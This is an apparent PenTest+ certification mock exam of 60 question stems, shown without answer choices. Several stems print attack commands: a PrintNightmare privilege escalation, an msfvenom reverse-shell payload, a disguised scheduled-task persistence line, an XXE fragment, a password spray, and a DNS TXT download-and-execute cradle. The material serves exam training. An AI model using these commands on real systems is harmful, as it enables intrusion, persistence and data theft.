PenTest+ Exam


PenTest+ Mock Exam

1 / 60

A penetration tester must identify vulnerabilities within an ICS (Industrial Control System) that
is not connected to the internet or enterprise network. Which of the following should the tester
utilize to conduct the testing?

2 / 60

During an assessment, a penetration tester manages to get RDP access via a low-privilege
user. The tester attempts to escalate privileges by running the following commands:
Import-Module .\PrintNightmare.ps1
Invoke-Nightmare -NewUser "hacker" -NewPassword "Password123!" -DriverName "Print"
The tester attempts to further enumerate the host with the new administrative privileges by
using the runas command. However, the access level is still low. Which of the following
actions should the penetration tester take next?

3 / 60

A penetration tester is attempting to exfiltrate sensitive data from a client environment without
alerting the client’s blue team. Which of the following exfiltration methods most likely remain
undetected?

4 / 60

A company hires a penetration tester to test the security of its wireless networks. The main
goal is to intercept and access sensitive data.
Which of the following tools should the security professional use to best accomplish this
task?

5 / 60

A penetration tester needs to launch an Nmap scan to find the state of the port for both TCP
and UDP services. Which of the following commands should the tester use?

6 / 60

A tester compromises a target host and then wants to maintain persistent access. Which of
the following is the best way for the attacker to accomplish the objective?

7 / 60

During a penetration test, the tester identifies several unused services that are listening on all
targeted internal laptops. Which of the following technical controls should the tester
recommend to reduce the risk of compromise?


8 / 60

A penetration testing team wants to conduct DNS lookups for a set of targets provided by the
client. The team crafts a Bash script for this task. However, they find a minor error in one line
of the script:
1 #!/bin/bash
2 for i in $(cat example.txt); do
3 curl $i
4 done
Which of the following changes should the team make to line 3 of the script?

9 / 60

With one day left to complete the testing phase of an engagement, a penetration tester
obtains the following results from an Nmap scan:
Not shown: 1670 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.3 (CentOS)
3306/tcp open mysql MySQL (unauthorized)
8888/tcp open http lighttpd 1.4.32
Which of the following tools should the tester use to quickly identify a potential attack path?

10 / 60

A penetration tester currently conducts phishing reconnaissance using various tools and
accounts for multiple intelligence-gathering platforms. The tester wants to consolidate some
of the tools and accounts into one solution to analyze the output from the intelligence-gathering tools. Which of the following is the best tool for the penetration tester to use?

11 / 60

A tester plans to perform an attack technique over a compromised host. The tester prepares
a payload using the following command:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.12.12.1 LPORT=10112 -f csharp
The tester then takes the shellcode from the msfvenom command and creates a file
called evil.xml. Which of the following commands would most likely be used by the tester to
continue with the attack on the host?

12 / 60

A penetration tester observes the following output from an Nmap command while attempting
to troubleshoot connectivity to a Linux server:
Starting Nmap 7.91 ( https://nmap.org ) at 2024-01-10 12:00 UTC
Nmap scan report for example.com (192.168.1.10)
Host is up (0.001s latency).
Not shown: 9999 closed ports
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
2222/tcp open ssh
444/tcp open microsoft-ds
Nmap done: 1 IP address (1 host up) scanned in 0.23 seconds
Which of the following is the most likely reason for the connectivity issue?

13 / 60

A tester performs a vulnerability scan and identifies several outdated libraries used within the
customer SaaS product offering. Which of the following types of scans did the tester use to
identify the libraries?

14 / 60

Which of the following techniques is the best way to avoid detection by Data Loss Prevention
(DLP) tools?

15 / 60

During a penetration test, a tester attempts to pivot from one Windows 10 system to another
Windows system.
The penetration tester thinks a local firewall is blocking connections. Which of the following
command-line utilities built into Windows is most likely to disable the firewall?

16 / 60

A penetration tester gains initial access to an endpoint and needs to execute a payload to
obtain additional access. Which of the following commands should the penetration tester
use?

17 / 60

During a red-team exercise, a penetration tester obtains an employee's access badge. The
tester uses the badge's information to create a duplicate for unauthorized entry.
Which of the following best describes this action?

18 / 60

A penetration testing team needs to determine whether it is possible to disrupt the wireless
communications for PCs deployed in the client’s offices. Which of the following techniques
should the penetration tester leverage?

19 / 60

A tester gains initial access to a server and needs to enumerate all corporate domain DNS
records.
Which of the following commands should the tester use?

20 / 60

A penetration tester gains access to a Windows machine and wants to further enumerate
users with native operating system credentials. Which of the following should the tester use?

21 / 60

Which of the following describes the process of determining why a vulnerability scanner is not
providing results?

22 / 60

A penetration tester is ready to add shellcode for a specific remote executable exploit. The
tester is trying to prevent the payload from being blocked by antimalware that is running on
the target. Which of the following commands should the tester use to obtain shell access?

23 / 60

Given the following statements:
* Implement a web application firewall.
* Upgrade end-of-life operating systems.
* Implement a secure software development life cycle.
In which of the following sections of a penetration test report would the above statements be
found?

24 / 60

A penetration tester has discovered sensitive files on a system. Assuming exfiltration of the
files is part of the scope of the test, which of the following is most likely to evade DLP
systems?

25 / 60

During a penetration testing engagement, a tester targets the internet-facing services used
by the client. Which of the following describes the type of assessment that should be
considered in this scope of work?

26 / 60

A penetration tester needs to confirm the version number of a client’s web application server.
Which of the following techniques should the penetration tester use?

27 / 60

A client recently hired a penetration testing firm to conduct an assessment of their consumer-facing web application. Several days into the assessment, the client's networking team
observes a substantial increase in DNS traffic. Which of the following would most likely
explain the increase in DNS traffic?

28 / 60

Which of the following frameworks can be used to classify threats?

29 / 60

A penetration tester established an initial compromise on a host. The tester wants to pivot to
other targets and set up an appropriate relay. The tester needs to enumerate through the
compromised host as a relay from the tester’s machine. Which of the following commands
should the tester use to do this task from the tester’s host?

30 / 60

A penetration tester needs to help create a threat model of a custom application. Which of
the following is the most likely framework the tester will use?

31 / 60

Which of the following will reduce the possibility of introducing errors or bias in a penetration
test report?

32 / 60

While performing a penetration testing exercise, a tester executes the following command:
PS c:\tools> c:\hacks\PsExec.exe \\server01.comptia.org -accepteula cmd.exe
Which of the following best explains what the tester is trying to do?

33 / 60

A penetration tester identifies an exposed corporate directory containing first and last names
and phone numbers for employees. Which of the following attack techniques would be the
most effective to pursue if the penetration tester wants to compromise user accounts?

34 / 60

A tester completed a report for a new client. Prior to sharing the report with the client, which
of the following should the tester request to complete a review?

35 / 60

A penetration tester wants to use the following Bash script to identify active servers on a
network:
1 network_addr="192.168.1"
2 for h in {1..254}; do
3 ping -c 1 -W 1 $network_addr.$h > /dev/null
4 if [ $? -eq 0 ]; then
5 echo "Host $h is up"
6 else
7 echo "Host $h is down"
8 fi
9 done
Which of the following should the tester do to modify the script?

36 / 60

During an assessment, a penetration tester gains access to one of the internal hosts. Given
the following command:
schtasks /create /sc onlogon /tn "Windows Update" /tr "cmd.exe /c reverse_shell.exe"
Which of the following is the penetration tester trying to do with this code?

37 / 60

A penetration tester finds that an application responds with the contents of the /etc/passwd
file when the following payload is sent:
]> &foo;
Which of the following should the tester recommend in the report to best prevent this type of
vulnerability?

38 / 60

A penetration tester is conducting reconnaissance for an upcoming assessment of a large
corporate client. The client authorized spear phishing in the rules of engagement. Which of
the following should the tester do first when developing the phishing campaign?

39 / 60

A penetration tester finishes a security scan and uncovers numerous vulnerabilities on
several hosts. Based on the targets’ EPSS (Exploit Prediction Scoring System) and CVSS
(Common Vulnerability Scoring System) scores, which of the following targets is the most
likely to get attacked?

40 / 60

Which of the following protocols would a penetration tester most likely utilize to exfiltrate data
covertly and evade detection?

41 / 60

Which of the following elements of a penetration test report can be used to most effectively
prioritize the remediation efforts for all the findings?

42 / 60

A penetration tester is conducting a vulnerability scan. The tester wants to see any
vulnerabilities that may be visible from outside of the organization. Which of the following
scans should the penetration tester perform?

43 / 60

While performing an internal assessment, a tester uses the following command:
crackmapexec smb 192.168.1.0/24 -u user.txt -p Summer123@
Which of the following is the main purpose of the command?

44 / 60

Which of the following components should a penetration tester include in the final assessment report?

45 / 60

While conducting an assessment, a penetration tester identifies details for several
unreleased products announced at a company-wide meeting.
Which of the following attacks did the tester most likely use to discover this information?

46 / 60

Which of the following can an access control vestibule help deter?

47 / 60

A penetration tester wants to check the security awareness of specific workers in the
company with targeted attacks. Which of the following attacks should the penetration tester
perform?

48 / 60

A penetration tester discovers data to stage and exfiltrate. The client has authorized
movement to the tester’s attacking hosts only. Which of the following would be most
appropriate to avoid alerting the SOC?

49 / 60

A penetration tester gains shell access to a Windows host. The tester needs to permanently
turn off protections in order to install additional payload. Which of the following commands is
most appropriate?

50 / 60

While conducting a reconnaissance activity, a penetration tester extracts the following
information:
Emails:
- admin@acme.com
- sales@acme.com
- support@acme.com
Which of the following risks should the tester use to leverage an attack as the next step in the
security assessment?

51 / 60

Which of the following activities should be performed to prevent uploaded web shells from
being exploited by others?

52 / 60

A penetration tester is searching for vulnerabilities or misconfigurations on a container
environment. Which of the following tools will the tester most likely use to achieve this
objective?

53 / 60

A penetration tester launches an attack against company employees. The tester clones the
company’s intranet login page and sends the link via email to all employees.
Which of the following best describes the objective and tool selected by the tester to perform
this activity?

54 / 60

A penetration tester creates a list of target domains that require further enumeration. The
tester writes the following script to perform vulnerability scanning across the domains:
line 1: #!/usr/bin/bash
line 2: DOMAINS_LIST = "/path/to/list.txt"
line 3: while read -r i; do
line 4: nikto -h $i -o scan-$i.txt &
line 5: done
The script does not work as intended. Which of the following should the tester do to fix the
script?

55 / 60

A penetration tester gains access to a host but does not have access to any type of shell.
Which of the following is the best way for the tester to further enumerate the host and the
environment in which it resides?

56 / 60

A tester is finishing an engagement and needs to ensure that artifacts resulting from the test
are safely handled. Which of the following is the best procedure for maintaining client data
privacy?

57 / 60

During an internal penetration test, a tester compromises a Windows OS-based endpoint and
bypasses the defensive mechanisms. The tester also discovers that the endpoint is part of an
Active Directory (AD) local domain.
The tester’s main goal is to leverage credentials to authenticate into other systems within the
Active Directory environment.
Which of the following steps should the tester take to complete the goal?

58 / 60

A penetration tester is conducting a wireless security assessment for a client with 2.4GHz
and 5GHz access points. The tester places a wireless USB dongle in the laptop to start
capturing WPA2 handshakes. Which of the following steps should the tester take next?

59 / 60

A penetration tester enumerates a legacy Windows host on the same subnet. The tester
needs to select exploit methods that will have the least impact on the host’s operating
stability. Which of the following commands should the tester try first?

60 / 60

A penetration tester writes the following script, which is designed to hide communication and
bypass some restrictions on a client’s network:
$base64cmd = Resolve-DnsName foo.comptia.org -Type TXT | Select-Object -ExpandProperty Strings
$decodecmd = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($base64cmd))
Powershell -C $decodecmd
Which of the following best describes the technique the tester is applying?
